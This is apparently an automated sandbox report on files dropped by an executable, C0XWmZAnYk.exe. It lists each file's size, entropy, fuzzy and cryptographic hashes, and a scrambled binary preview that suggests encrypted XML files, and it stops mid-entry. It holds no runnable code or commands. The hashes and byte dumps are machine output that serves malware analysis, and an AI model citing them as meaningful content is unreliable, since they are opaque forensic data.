              Preview:<?xml...gH..t.}I.{..<....x_Z...^...x..q..H*...@U.M.....+./...8L.c....-kv..+..c-2.Z...W.|...J.^..g..2...)<...?.g...,..Ngm....<*........TiU. .#..0.N.S.+..{D5.../..om.6q-!....v.....|..\..S.=.'Z.R....J...v.x..0..ke.h.M.....=6.2.8.K(.....8.$....C...!..,.$X.i..Y.5.v;.$.....1...AK........$...u`..l.5.?G.d..Ta..mC.....P.m5J.Q...*....;..j"..p..*T.}^'...v=.[...........R..{.K.#I...y......u#...G.+..y4..\...v.#..D.).+.k...7.6....=fC?.M....c.M..~.s..v....]....e].1.`...R...c....$W..d.m.I.-f..@{........lq.....k.T.....j..0.qT...b.T3.t^.&VM.@.L..K.+2;....'0..~*..jl..r0...7.....2J....9#Mo,.ZW....ue3.s../y..(lC^_..)......1..\ft......K..1U.\.4..o\s..l..E.:...,.u.)....p7..?@...&A.Nn....C...uZ0......sDsnp!...z..\......+I.O..|....\....... .h*e,v1....+Xo..9S9i...A.7..Sgt...i..ST+...b..b...4]...C.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3566
              Entropy (8bit):7.944058317727479
              Encrypted:false
              SSDEEP:48:Ety18uczCeOPIeRCj3fzD9CSz/ZPsmnsQFcT/X+urFDt9NNehKXbulbpY62tJ8D:koIOPj2zZrzRPHwz+urFDt9YKX4Y62w
              MD5:4DF790402A655E9AE0AE70B721DB6D0F
              SHA1:573BA00DFAA587E237285E77C141F5D717360405
              SHA-256:E2381F35DCD874D75979099025132760ABF4DA78988EFFE5B7D3F603A36C5101
              SHA-512:3CFE8492E31030C5DCD8FB4ADF82E631F6FFD8F6C6D50270EB7DFFE3E5291E94AF9D3687E3A36AF4494DB7C7600F62CB0BA1229752FCE8EFBCAB3EFDA043F748
              Malicious:false
              Preview:<?xml.j3..R.x1.=j<..y......'.......T.`..;.Q.~Du%.y..A...L..81B....i....m..@.[...{F2.....)79.z.&.b0.....[.N..YA.J.A#.9/..T..1..m.(F*.C. e.x....~.!...9V..1pG{...Fg.....'.......c.7r.L*..e.<r|R.R.Dw.95G.6^h........+T......B.&.k..:C..........b.v.n....QM.jQm.Z.....P..w^.@.b..I.0o......&..:..+.?6../M..aB.Lo(E....mq....../4sM.5q.8.....LV.lpg.m`.W...-....JR.k........k..fw2.A.........A.......K...zk.pA.^.._D.P..q....q.u.9.6.....i...9HF!.N......E..:...^...l..~.....O.$....K;....(...n.....@....d..b....p..C1.&?pI....o.C...C..*..4....&.h.-....KaOem.&...|l.z...J7^#.0...^....m.S^...}.:..R^...~.!.).-!....*N8..89..Cr+?.....-......C....O]L.%t.7..,4..KK....D...':l.....,X....`..t......!.!.6..a?0.q.$a0..t....IL@P.j+mwC..*.``.;=...+..!..auv.pD;9....O.v.=.&...H....`Ug..$.m.I..k.o......>.<r..<...M.-...K..J\...vj..>H<....1B..77A.....:.b.I$b...4~..c.....T|..<y.M28a.P..y...F...?T...h0..Ecv.0lj..._-..j.g...ON .Kc.........?.8..$..[..YB.1...7.4C.>...... ...fR-(..Zx.a6.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3677
              Entropy (8bit):7.943268979404923
              Encrypted:false
              SSDEEP:96:hLYJBbdiW2fmoNcYbOkOiB+hPkuwMgh+djc:hLY4JfXNkkOim4gjc
              MD5:D28145AA6DEABF6716A75586B1CD1BA2
              SHA1:79F940416752D65FBE091BAEFB281E1B28AF4802
              SHA-256:57873BB79B7D2C04920303F416CE66C644AD1FD5746466C6C85F4AE26D0EA12B
              SHA-512:2DD8DDF6742E118CF09425BF7E1432536D8E579DBC214D656225A21D0BF0961BDB0F344A11A69C381EF5F2FE97A8BE949056E7ADCC4583F53AB7A87985A89D33
              Malicious:false
              Preview:<?xml......09......*..{.8}s.......2........b..L.........1..g.m.:N..*..F.b...yJ%.g.O...+....B.6Kf...i..v8.....5......Y.$..\..p.6.J._qH...........x.A.i.Q@72.g...g... vR;{......_.r.j.[.R.n)..B.S...}.r.N}~s9.&.<.DS......(.5..5......3.nD6H.a@.....T....q../....$.T.q..b..W&#u..=u%p.?..........*..'...3..._.u...4.{:..#YC........\....p..\+..Lx........t.)..q.`..8p}.gpz.......#....cOb.@.6o.....a.)XThp.4......7.p.|....P.:...P...EVMl.`..~EJ..7.n....e#.. .&..|..1c.#....aU..;.:o.Y.U.P.(.I?d.*...N.!.)...H..k.....d....v8..,&Y..d....v.....3.....(B...".<..p.%.PX:6O*.G.E.9.B....p:h.r..z..w.....B.....m&.@F........4..e..r3.Y....4...l5O......U...G......-..Q.c.&9X....d.X....k.>9VtN4.l@..;.;J.,q.....lo...$&.....n....3.8C....b...S.. .j}1..4.>..3...6.....m..z..>[..'G......D.U9.....d.t.dK.c*.....X\Oc..7.,.b.A..K*U..!....D..-D......Z@T.;B.M...y!._... ?z.h...*.{...j"Of.Oy.v.>.2.(.0.0....lEP....J...nS.RC..'..u?.|vwv.3..9..t.Yl.Y.6...i..;k./.)..D....M.!""q.DV
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):744
              Entropy (8bit):7.688205392034512
              Encrypted:false
              SSDEEP:12:F14grro1vaAU27QJA1mZ7sfcJaMurMYelN3qTre+KkK42xPrGi6VVTvZaKPdxa3X:PWUrJAoRaMWPelmrxW4SofTvnPd+bD
              MD5:52C1FF51AE3AD0F24F95ADD45F636A41
              SHA1:A5507CB8C37CE64519B388423026DE39E026AAF0
              SHA-256:0CB145A4A499EA26EB16FAEFE03BD716A9510C69F33283EBD867F0C34AA57000
              SHA-512:8EBB621BB3C48D30C1467436D6ABD0CA9F7256EC1B03B123C1F5C5AA4B8442D53F13D61492E29EC253FC542526E65C10D78D4E9F67611DEB97658939698B1861
              Malicious:false
              Preview:<?xml....O#.D....0._...c.....@...s...a..-4...."u.G..oj...*...T(.{gd.!.?W...y...{..K....e.-}..'....-...l`..Uo...h.>Ng.b.a...u9....b)..h.....XF.1d.Mo..EB..U-%)-n...p...<..Z.b.=.U.T........~,nt......2..A.8c\u.Y.T.NkNn......z...%..C.k...H...3.`.38.>&.@..<4xE....Z..A&`K8...]dq.n.......|Sz7y5.......R.8`.Je...M.i.Es#..>......q._..{.y..u5.>..UZ..3..i..Y.....'...%.R......Z~..+K..~.Sj..R.L.j^S.v.+X..c....r2..cc."[$....!..EWbu....T..)..J(8^...Q.j.[..-...cZ..x.<[....... .V...5t....<.....+.c@....*^.e...'.p..0...........|`....;...N...Z65.zO.,..x..rZ.Z..T...c_>....UIv.Z%..{..%...P.Pn.D|)>"....R>B./m{M...(Ql.f.N.0..._.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1620
              Entropy (8bit):7.893223215054361
              Encrypted:false
              SSDEEP:24:/djhwXWDNUOY6yCI9NnvHH3v+8jDq/u/SV1l1O8zNiprL1QD9y3Npd+bD:/xTdI9Vnf+8+HVNT5iR1Qk3F8D
              MD5:1B9A6198E5018EAABA4510A51CEA6674
              SHA1:183F6DAEB3D1F6C015FE67024984EAD7C2E2F7EA
              SHA-256:07AD8A1312F7CB04C207C1036162811AACB2819CCDCB09FCDA605EF65F24F0CA
              SHA-512:7D9189474D1D5531BF0EE9AF8C7C78436EF1046718DC046A7B274741A7597263E0C85A15A0CBE23FA50334456BDE454270211359F18316025507777F0600E53A
              Malicious:false
              Preview:<?xml....%P.f.....b.NK.4..0..._.$4...!...q...5..T..d....0.)W0..Sf...A5_c.v....;.ka.'.1O.k...1.\3.jL...2....'.iG.4U..E..M.,v.m.g.BG*.brJ%..x.Fe...,...bNR..........nM.|.p.(x..=[......BvwW%.o.y.`................])...y/..h3../]..GQ.....b8.f91FW..*...L.P...QX."..0..Xqi ..6....>"..A`t.C......c...i)&JN.e...3[.|..]t.... .u..w.^1..c...J...l....t.k..;.$..GW..x.E.........d-Cv,...TY".Vj.v.q...e`8..I..1J[.....{LkE|.......Q..9.."@.o..l.I.a...{..K...{...g.b#.k7..M..w.h.R.*....L...Rrs.LV......!Iw..0.B....l@.......:%2.j.~...rB...,F.Ec..z.G..%...x1<..U.0.#.j....b..M.ul....f.rr....M.DR....d..;..s."....LYY;b.[hg.m.2..Z..m...N.W..&.T.&n5|...........ds7.b..[Y.....%.......f..<.Cc.:^........Bn/.i+.3.u.td.+......:#..2..=P/{1.P...7R....C\.-.vA............v.i.P[.J.6.H.W.p..U!*...U&...-...:8.>..\.Q.....z{.!........A.4S;.I..IT.....c%.u.h.r[2y-..s..x..a.fEM.N.i...y..\.........8?g.s.....vU#.#...n..z+>..NhUp...a.o.....y...-.,...Y.0..p...A.P.t<n2.c.s"1......M.4..M.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):821
              Entropy (8bit):7.714107708988103
              Encrypted:false
              SSDEEP:24:uuI1k5a4C33ebPE/IgSDUfhzM88GdbC3d+bD:uuIua4C3uc/IrARMxwb68D
              MD5:E45F37CB058C4DF0CAD7E30C13DB8AA4
              SHA1:DA8625FE5D827107403D15D9825166BF74CBA239
              SHA-256:E8CC9D0AD891F61A5167B61CBB9FD00E89FB6BBCC8E4D85DEE10CE095C08A9EB
              SHA-512:FA7D7E2F407D5BA2575CE0CB21E6E492205035F93C8E0D0A20A28494494ECEA98BC67B27FC44887CC33D86BBBFC63FD1593637B4E4E42B7DA4750E92460F322E
              Malicious:false
              Preview:<?xml.....vO%..o...&~|.vu...i.>...guC....%..:.....~......k...........k.D..d.k.......b..........J.,1X.........yr."....I|H....~..o}.....g..h.v.{/..2.h.sM.]......d......V..2b...VS..m.x.{!$...........*.L...........J]........E.x.8......S....cN.N].W.p<.h../)./..U...".p.-a.V..1...t.Y..+..G^]...Ja9>g._K.......g:.t.+.B.hJ.7.T.e....Z'|h....s...Z.pH..&r.ul..r...5.......Q....<T..h....T.z.3N.....X..7.i.v..D.Li.e....L.(X.fP.._....17..lg,..cB...}a.............c*Qn.i.z..(....EE+2|..,........_A...@.k^!jF...Cd..U..1..g..E5..}..]...7..p"....^,.,..].j.H.i...gVr....|.V%.bG...J.&<1...p.;e.w.<.AK}.R..).s$.......]..Y.&]b..._N..J./...>.>Aat..&.............Y...C1.cM{.j..v....oa....@..3E.*=m..f..E...<....d:.n.n.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1034
              Entropy (8bit):7.800502330842956
              Encrypted:false
              SSDEEP:24:UJ1ir0cL3fwylhMEknXZMrVz6tvu/7DwuOkKHyd+bD:Yi7jYzNZMpWFu/Hwdke08D
              MD5:9B6428F556292EF5A1AA17D579623D2A
              SHA1:44235FF57AB25BE55A7C2FD5E902B3E04AB72B01
              SHA-256:810D366D23673FF28F08DC44E5AA9250345DF0EBF8745AA1D8AAEB33A13B1FF3
              SHA-512:D883FD5F42BB5D506209EA6274E27E4CDF859781B76C99E8426D40B60D97C6A0765FACCED4FB811884A12D25B67280162C2514C63FC474E6492636E3C465959C
              Malicious:false
              Preview:<?xml...T....tWX.....s....P#..`.U}...8....g..t...!......$N!.`..7...fCv..h..\H.v3.q&.!..<?.s./..Em....\:`B...b..Xn659.ra...5..s7Vc.p'..g.Q...].o......F......y.Y.y.D..8...I.c..n|.mBc....?[.2#t.)x.......t.?.=.v.m...r....a..t=.]?c.F...0.XT.X"..#`?=..uK...>....@...B...Q....e.I....^{XbJ."@4..`B!.a1.vV.57l.......F..$Bz;x..ji.J.'O.A...r.I.H..P-m...A..v...&f[a.zN.f....MMR%b..auk..ICm..[5F`..(....cx..3,..+..B.......f.+..C"..X..b...R.xD..I.o.r....7...V.dy..K....t.{.IC...!.>.>1 ,.# ".8Bd..QGZ.,.......Z..kf)..!.v...U.....&.}.{...z...>..S:.$....Z..[..]_..G!=..`S~...A9.u...I..m...Dj.../....\....;..Y0Y.a..!..a1...G.S.....\.xoL.c...G..w..m<....:YK...b.F.f...LIl.wI.5.....+}...0W.2....sg... ..G""...6..P.b...-..U.....kI......(.t.xM...g.D[KY.oC.g:(t0c.S...\*".].(.E.=.C..?)..].S.......j..u.~.\.P).Pq...rBB&..eG..c..Y.Bt...Qk..[.4.Z...'....P.4/Z..r...j+TW.......TLV..E.l.YbD....iv.d....w.....ydV...).S.%).2X.s....k..Zn.6W..m.>gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1333
              Entropy (8bit):7.852494055597412
              Encrypted:false
              SSDEEP:24:ALQ0cFKd7b6WCqiBhhcfxXbI3C9IxGD6ex16m6z6zSqAr7Cq0wRuRd+bD:ALthiW9pEPs6e5+6zSLnVY8D
              MD5:3C522BD80A0D066AA882BBDB054CE007
              SHA1:D96C70D9FDFF14B9EB64D7821E3AB76316B71A6F
              SHA-256:6536223F841D75BEC98767830575F18E9355EF6BD297775D3D656C2F8D8FE00A
              SHA-512:8513A933E096F22F528CCF7FAFE12A315D83C0E5167EA6F532C5E3CC123A955EF81C2507D3290AC82963A63518E33791F0E38D637711A296F9759A820EAADEA6
              Malicious:false
              Preview:<?xmlo..jvu.$...44{...*P.[.Ogz.7...DqX.^....rA..~V..|<.........S...U7..........F...p...7x....3.^{....wuy_.<.;..(.....W.../.:.M........8....."\(;*.ha..Z..x.oX....).j.....4hA{.&...YX.H.]..Os._%/.d.J.U.?(+S.@...Q..k..*...nje..E7.|K?...iG9B.{...>..Z..;.....~...'.kEW...c..'2.|.hF/Hw$..!....d...j5.H.@...^...}...jl:wf."?._..../........j.`".W+U.*j9.....;.._.r.:.N.....3...[...T.&/V]...C.x..4.....4..I..v..4..5.owJa...1.j......p....r...W...S%....<.....K.wly....R..(...4....Te.i.X.k.JA.`.M@P.h.%"E..<.Y[...;x..1z.N.."...b.p...b.e.q%1..e.(..h.j.'..~cU.....[1U..L....V.~..t...AC.2}o7....M.Sv.H..!....P..W#....U.4C.....}........H...I...P<.0..r.#..s.....t.b..]S.4+.>.{..{^.(-XbF.B&.0;..W;1.f`.....<$...}.......a.}.,P.a.C.j..........?....=......_.U.q.....%.m....{.hV...v.e..............O.:.....[P..X.`X.8.p../1.Y/c{<....5\z...x..I..x.L..g..<'`..m..N.>".B0....2...A..6Z>..N._.r...F..`].^..}...Te.|. h...6.mm...'.......K>....z..E.^x.D...E.*.z...S..p.%.<Zr5F..qF...[.2...U
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1665
              Entropy (8bit):7.877668169765664
              Encrypted:false
              SSDEEP:24:xO5W/mZgpTzFuomaDwyXHukm/US+vSyYKVT2EkNEAJ3MA6n0iuI6wVOeyNa3DpBb:xOUKgpXwsXgUdnZ2EiDDwVOIzLEJ8D
              MD5:897F0CA38F86F1A34DE5C0F0204EE251
              SHA1:47FFC61790C2874246504E4D3141D5D53AE94637
              SHA-256:11E821E90F8AC08C187AF8ACDE31471A6C3ED5636079CA6A9FD1E5BAB34D8023
              SHA-512:B4117B9445453EEE28A7C0D78E12D48DC96B0712D9736365EB3A6C6603DCBAE09D49366A98478F6384458125E414C6EF58398667E5BB220FFF93E7644E60BA20
              Malicious:false
              Preview:.<?'4S...sz.`.h]e..J..kUT.9.y....L..... ..Bn.............#._..u.XO .l).Ek...w3o. .....k....5...].<)g.2....1.._.W..~..m.O.0.5.U.k~G.$@b.:5......-:.ZX@dS......\./.%3Xh...P.....%zL.q......B.._..F.#.8..K.....-\.|...N..N.G....hKW3..~.q.7?...s....WL......K^.,.=To.5{`.!.x+B.......SP....G. .?.(....>.I."a;..M/q.e>..l..N..[.#.#.u.Z.].u.....0.......7]$.`...E/......k!\.(...W.C.=....$W.Dz..Q&].9k#...Mg../AI.zFNP...A.Y..~.........o..+.F.i..!R...h..7...P.(...&.B.T....x.9%.i..J=...#....~}.......^.=...f<.G......,."......>Z&w~+.....E..E......=....&........j.r....*.f..\$..W.....\.....+.A..!.{..~a...;@..I.......m...........ebg5$._Z.*.$.n.b7..*..I..7^.p..0;0..D.x...z..P)13..u....<.E..E.\.3...7.U.D&..v......Y+...q).jI.v....B*..*.....%}.n*.......4...a|,g19.V.`.G".9=....^....V....f? R.e..>.i...}..hkg.G....+T.i.u!.1.....>..B...q..|#.y.B7.G%.#..b.>8...Q4V.?;W....~..K.j\M,..:../.....*.N3.ewN~.R.v...,&+?....v.....2..... V....E.>......m0..C..X..)&f..B...!...d ...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):992
              Entropy (8bit):7.793328355580851
              Encrypted:false
              SSDEEP:24:5tIOODwqSaFHC6Sp3NaUEl1GdCHeSzibYxwd+bD:5ttnsF2pdMlMcvzqYxm8D
              MD5:5C4D8120D2C33333CCFB35626550663A
              SHA1:79972D2E7AEDEA3525A3BF07B926E330946A6C04
              SHA-256:EE3F4F8B9E281D04633DC8FC64ADD30ACADDA0310549ADD4B67880480B406EDA
              SHA-512:84E082E6B50AE7DED4908D9691D22FEADDFA0D68B4A8F0A81D289CEB6B02AA9939C95FA78F3D9678C0B2AB4BBCEABE8742C5A0327C25EAC3918102401DBCDE08
              Malicious:false
              Preview:.<?]....`.g............7..n.......z..6u=d&........!....n.w.......mO.SR.}..u%Z....d@.1..~.g ...G..i...s.}....H>....I..t.&x.Xq.^.6...,..).s.[.P.:....&..Ql.U9.....\.l...P....q.v;......0Hl.<..^.M.Q.:_I[i"..t......b.+vV+._@...}f.8.cS.|.2^.=....y..^....iF.7|.t....*....E...H.r..4.5.w?.. .hD.rh.!>..21.H.../...$...3.[./G...s...$..p%...>9..bn^.h..I.t...Q]...Q.kL".|.Mnk.<......a;.N.Qk*yK...w3@.....3FGj.8\>1.&|..zz..uY4.^ ...d.?..C..a.K....l.rZ...4.U.N.".c..:7H.B..?.t.;A.S.m.@1_.0<6..S....j.9G.........wa2T4+.F"..X......N.|.hF...P$..;.@.....,...=s...C..B...... +.;..-./g.HU..*{..'........."Ey1.:..I....$..\....9.%.^.;...8....R.:.-P.g.-h..&...S....@;l....;.j.......E N..#.2................^cc..^5>...zv.C...fL.....Wt.}.{\..o.(....MS...2.6.&......rC...2.*...l.s.)b/.E....2.$E.k...h{.....Yy.|.u.......E.....V+.!'..ES.9/w-......-.6S?..@LUl>:z..!....`.(..l9...]G...4M..~VG..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4150
              Entropy (8bit):7.958472633163478
              Encrypted:false
              SSDEEP:96:eRdwVcGE6zws+lQizAhLHjpennZVXbIVJL8p/sPP:eUSGE6F+lQizGLs7XbIVJL8p/s3
              MD5:99F068E7A7387AA253306EFB706B85AD
              SHA1:0557B922B5770705B0C24885B2A31F378C24BF53
              SHA-256:E4EC8E960FAC197282B9B3F1657506D0C64FDE68554F3D7ACF9CAA5A130CC1F6
              SHA-512:19F7C0DFD1B69D58001A67CF09F169F553EF54CD33860CDEFC7CBD29EA80EB61884AFF0C1801FA7E3E6E5C0E524493D95D8C9E4ED612594BB134348E45BE6522
              Malicious:false
              Preview:<?xml.'8.^..2/........"Q.;W-.e{<@[2$p3.#i=.,SJ.`........>.L.-.\..&+r.....T.:..A.O..P.29...t...7w.O.iM.:....M..\.3i...Jn ...Vw... U.Fe.....p`..'.V.t.a.d8.1..@..5......T..WO..(......,|W.{i.....'..7......#..."<.M|.q..g....s.1:....s...^..s.......?....J</...a..R}.%y...=.Vg\..g.. +f.....|............R.+....Y..q,.V.c=p..|W)...e....Qb.4}...x+..3......p.....G..`y.....]9.....I....(.p.@...).1...=\......5X.x...d.r."........Y.^.m.&w..{..q..6#.dz...j....=T0.l.W.........iOb......n.........c.....+....\.;..=...M.~.D.{.S.W.l.(.c4.3)..E...";...]...2.x:.......!.~F.?..`.w>.........J...8......._.=88..{.20.......x.8.R...L2.{..C..>..G....t=s.VO...Rwl.3.7..j..NAf.J.q..{..0/.8....=..m..\....7.Fz..3.0/..^.......5..Fa.....9..j[..........U*uBj.m....R.?.5.j.R=.,.A.....5...G~...#......R...?*>......^.../..wk..N.....Z..>l.c....yO....ZZ,u......"..NSQ....49j>a..._@.~..IJ.nv.a..1...D..m....y..t).2....6R".%..R.P..\...~u..].%.@H|..iFk].Z....1..'}.._'...l.<x+...8/)>,^..6...'...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2801
              Entropy (8bit):7.9340200880651315
              Encrypted:false
              SSDEEP:48:AUwu0zoJsgq30rN6m8iaeAYxi66EiN8F1i4E9s2stVdeL3rh9dz7AFMfChfILpyV:A1L3gq30plH55VG8F8Hh9dHqhfIH20k
              MD5:05E909A30C3701803B427BEF6ADA8A3E
              SHA1:E6D1B1175C4874BD52CC540FCB208E674FEA1E0E
              SHA-256:FD374010B0B543833D40065D828EA0902EB2A714135F3F093217EFADCC7DDC37
              SHA-512:ABCF175CBF62159C2BFBEBE4EBD5CC75FE9D2740B7E910D2EE3C81299001E8A3744F3DC007C43D29A3140DD3988F25547224882B57566AC6CBDE240272811A07
              Malicious:false
              Preview:<?xmlrmm...U......./6=.].h.c....@....U.eJ...R..Y.Q.j..y.c..Z.A.......y3.F}cV...!..\*.us%...F.J..>l.r#.b.....p-.,.g,F...Z.......!j...R\....O...g:.j......qYp@....(........@.%...?D.B.._...~z.%.{..N.A...]hb.8u..Xbk...W...U.N.cw.Y..y...K.)..m.]......C.8'.HQ..m.!qZ.k..G.e.q/:}.....w.....b(V...$...s........|.EV.]U.....~3%3c..`0..P...Q[.9~..$@.....]A..y..4.Q.hS..9..&...M0f....`....PL.]...Rn..Gog..e.w...72....9..iI.[.....ra.;Ta_....[..q'eN.^q.... 9...~.......9#.J.D\.CS..M.....!s...z~..h....=.C..@.1BV.....7...L...J.."...[n..s........h....!Q..._.O...<....2....Mb..$.SC..~O.u.+U>J.bPx'..NH..qM...bB..m.Eb."..I..#.x...='?~k...91Aq.....<|".......T.......eSQ).8[..P3D...PM.p..q..m.nW.1.A..........>..C_?L.V@..@M.............TwIju.....<.(...9.5Cy#6u'..o...Q....@..z.....'.H.?K.e.v..s.......)....#./...........(.I.....=g.%3.M.p..}.ox.T.h.O.VT1.[f>.?.......O..*Nz.0..\..[.",.w..e.m........R~.[]E".>.UB~..=.o.J.....i.&c#Xq..}.*...(.....k.&fxf.R...CA..e..s....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):4122
              Entropy (8bit):7.956866754598893
              Encrypted:false
              SSDEEP:96:TY/xb2yv/4a/jmL0hOEt3bWzW5IsLcKLGWkLQNiXiaFRR7iGv+:62yvQkm6dt3bWz8t6ZaYiyR792
              MD5:1DB9F27C74A209D16AE8AE26B2BB4EB4
              SHA1:72505DAD4E09F5F97DBF1BA57B97E289895328FF
              SHA-256:F6ABB69AB5EA050FA45448188783A01270A7BEB19D172A386D5FC71271CEC3E2
              SHA-512:238DF3812E98B026CC48C043A6BC5BBDC773F7F59A1F8CA5ED4521F9B9C301C9448ED6F77CEBF57B0C092142738EC77188C8F7CFEEC7B72178CA47387CFD906D
              Malicious:false
              Preview:.<?..?...KL...,?-.......|..*.J..F....I...q.......v.|....1..kI6y.@.TZJ._|...p..Q.gm.P...}.....u.q.T.b.!3g.3C)..8.....q52.)F.v1D.-.5Q.t.i........W....n....'Uv.T.Fj.R.<.Z-5.3.O.jI.....%dB...../...z.e.Q.q...V.R.e.I.... |..../....s.........F....'..K8z.R.;...kX*..X!)^.P.>..D.r..v.f....LJS...f....i.F...0_..}.......T.Z..$_S.........m.*.].Z3...*.d.=.kV{...y.t....C..7.P.$.@t..ie.....V3;[.({..........FG.UP9!.`..e..?.....?.}.j.*...%]^$>$..W-..<....)..&>.c.OZ..h.C.?.:."Fk..I..;...I.@4..:.....z.L..&........L...y:...S.x4.....!..34a.....@..._..Y.+.7...s...........3.e...%....L.AB....6.`..&.....E|? ..6D.s...Rw.q?/Ncw6..*.%.?.+.../W...H.*..9<@.......r.....Nh$Lj..L..i>.oY..g.K..Z}/S[.{....bx.BE`......l..".N..j}..?.tK|+.V|h.J.k..G..B~.....df>T.:..\8p....;C}...1..rj.b......#8I....<..k8.....C...*.DD..q}a....rBm5].w..'.._...%....|.b...#.2=(../I...Q...@..V...y.!.<...gD:.9...].M.J./.vM]........x.......Ms+&.t.....$.:.4..9}B...R.....A$O......Ng+.L.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3314
              Entropy (8bit):7.951837273868338
              Encrypted:false
              SSDEEP:96:Ss1JlWsnnf1q9rZf/W8A/ftFFz/aOq5sdp77E9Q:R1JlWIW9mx7FzCOSy7V
              MD5:B72FAAD8770F5AA2FCD87DA183C3EB3E
              SHA1:0F4132B53C672F343428B719CDA1D23BEA4D4575
              SHA-256:531DC5712872CF3F6D143FD010FB518DD0D90DC4A8BAB5D463BF1896DF3A3CC5
              SHA-512:E004D0849CB61BA996163A24BC8B0A16CEFE6A36C386B63F00CE5DBB2FCD3FF40B762FE7E73784188DA26A86749236167EBF8C94CA5BDFDC157E69476F07ADEF
              Malicious:false
              Preview:.<?....r.@.....w8U9.$..7...+.@....P......E.A.n...O".j....).O......~.i.....F.y...~7f.i...V.s.O..^.y./h.EQ......&.k.u.|.Tc&h}..*:..O{%........\.4..C..*..KDs.J:xJu..x.12.n.D..+.W.(.%7......5S3v.......]m.J. w..G|B....v.N.I}.p.L.3~l*.;!...-............r...N!p......`./I.F.K.i..&%.O.bW.^~.e.7i.M..~.....n.f..........!...W95.#.<.1oUe......a.=.<{@o...>6..0KA..'wY...u50.W..J......`.e%....fsm....T)..l'|g..+HA%.P.A.C...|..t.hq..o...[.s.{.....)..y...5.a.`w.2+....9.. ..|.M.....2\]3j1.H.h..1...U#_./^...\...$t>)..N...&g...0;4..T..._..^.P:...|e...v.p...l...)'.dc..J,]......F..q..h6KA.'....8..../.......).X.n.<.N..>wh.....Q.G...5.j......j[q3.u..#.1..S.....>....M....:~.S..-N...c]..y...UFo.h;T(.R..F^O...}V.3.(...#.0...o.1P..g..A..U..@...$.e>..R.'B.L...<...3cW2.$.n..oU..[v.k%.(.....?..../). ..]r.~.@....y=..^l...._.4..........n+..b.>..(K.l...S13...~..JB5..)..-.s..4.....b?.".Q.e......D.Q..d......v.q......a;:......x^.u.u../@[<B.0....W...,J|...e.J;...........=L
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3676
              Entropy (8bit):7.957042756364691
              Encrypted:false
              SSDEEP:96:a6Aq/Ns8Uv6IXuIMmLPTtrVChetFTByBAr0f1Tzu8C9Ua4S:a6VBUymLP3HFTBofhaz
              MD5:D3806401FE3498426D5B38484E974EA8
              SHA1:AC4897C63A2AA55BA284AA28450B4D21FB7778E2
              SHA-256:5E6B507991DF8FEC87C8EE1F40EBE653E710AA4C4F094C8CB0C5E63D416EE6DC
              SHA-512:2FBEE53FB1C58F2885F7EFE6D534630BE4B06A591B0AEF6A16C2CF3E2048D27402C895A2742526C5439BBA5BAFA17804025F395A18E3BEDCC5405E3BB944BCDA
              Malicious:false
              Preview:.<?...KH...O.\.Hz.L.........im.-3_..r.f.x.c55@k.....A..9.sM.<......S/.@.{.L..y|.N.x'.i..}.i...6.:..2..hn.a.l..V..=...8..X...@_8.$h..c..@Z...[.c&.........+.0.1k'..H...rp,....!..V.....N..QW7VU*....)....k.......a.&.<..^.GZ.. .B..Z3...T.t....f.......)..n.5Q..Q...=....V.....%.Z.Df:.....D...?...b.n}....*dn......d).<L..@cw....p..-%.Y.)..GFg...<.h.y.q.I....C...:.....N4.!..f.P...6..\^.....K..U./.d. '....H.G-..Q.)E...W..n.G..R..4.C.~.<_$6.`...8F....@..t....)t..[."tpPum._..h.]x\...d<.,$...$;._Nd.L.ax....88.p#."b..x=....J.......s..i.b....2oD:._..h.Ns4..%.*.8..7~..K.m..........Q..l>.%...).+.$.c(.c.c..o../QQ.....J..E.P.,...mW......e.?.'.)..<#.c.....=.<.2...'..T....!.c...0.D....sY...E.hM*....+.-..h......E...g.t.(L..R..~FG|&.k...t...5.:.x9..i..;M....0.1..]...#.[4.K....\....._.l.Yt....=..gq.p`l.../I_.../.7yr.g.F...../(d=g..-pu...#..../....2e.....#.....paz..........l_......~..1..0.MO.O...D..&...E..%...0..7.oU......U#!.Y,.R....q.[..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2925
              Entropy (8bit):7.9354439621577315
              Encrypted:false
              SSDEEP:48:BQbTU0KAuuSqNnHXHPdyHLo7zKiKwW5aJJT3fhqZaECzVWyhwMw2zAQOoDHDw+ca:BwKAzN3HP0ro7zlBiaJhkEVV3bOUHDya
              MD5:9C5E96A905C4C9F212E42C5FFAEADA8C
              SHA1:4851593B0162FAE86400DECC72EE9E44A873DA3C
